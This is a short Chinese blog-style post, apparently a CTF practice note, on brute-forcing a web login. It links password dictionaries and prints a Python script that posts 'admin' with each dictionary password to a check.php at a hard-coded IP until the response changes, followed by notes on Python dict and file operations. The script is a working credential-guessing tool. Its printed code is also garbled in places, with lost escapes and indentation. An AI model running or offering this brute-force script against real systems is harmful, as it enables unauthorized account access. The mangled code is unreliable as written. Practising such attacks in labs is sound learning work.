暴力破解是最简单粗暴的方法,无论你的密码多么复杂,只要有足够的时间都可以破解。只是破解的效率主要就是取决于你字典的大小和有效性
这里贴几个字典:
https://gitee.com/XiuMulty/PasswordDic/tree/master
https://github.com/TheKingOfDuck/fuzzDicts/tree/master/passwordDict
下面就是爆破脚本
import requests
base_url = "http://114.67.175.224:17345/check.php"
payload = {}
payload["username"]="admin"
Fail = ""
num = 0
file = open("D:\dictionary\top100password.txt","rt")
for line in file:
num = num+1
line = line.replace("n","")
payload["password"]=line
res = requests.request("post",url=base_url,data=payload)
res.encoding = "utf-8"
if num==1:
Fail = res.text
else:
if Fail == res.text:
print(str(num)+" "+str(res.status_code)+" "+line+" False")
else:
print("�33[31m"+str(res.status_code)+" "+line+" Success"+"�33[0m")
break
通过这个脚本也熟悉了python的一些字典操作
dict={}
dict['aaa']='str1'
dict.setdefault('bbb',123) #若存在key 'bbb',则设置,没有则不添加该key
dict.pop('aaa') #删除key “aaa”
del dict['aaa'] #删除key “aaa”
dict.clear() #清空dictd里面的值
dict['aaa']
dict.get('aaa') #获取键为aaa的值
dict.items() #返回字典里面所有内容
dict['aaa'] = 'str2' #重新赋值
dict.update(dict2) 将dict2和dict合并
还有python对文件的操作
f = open("","r")
for line in f:
print(line)
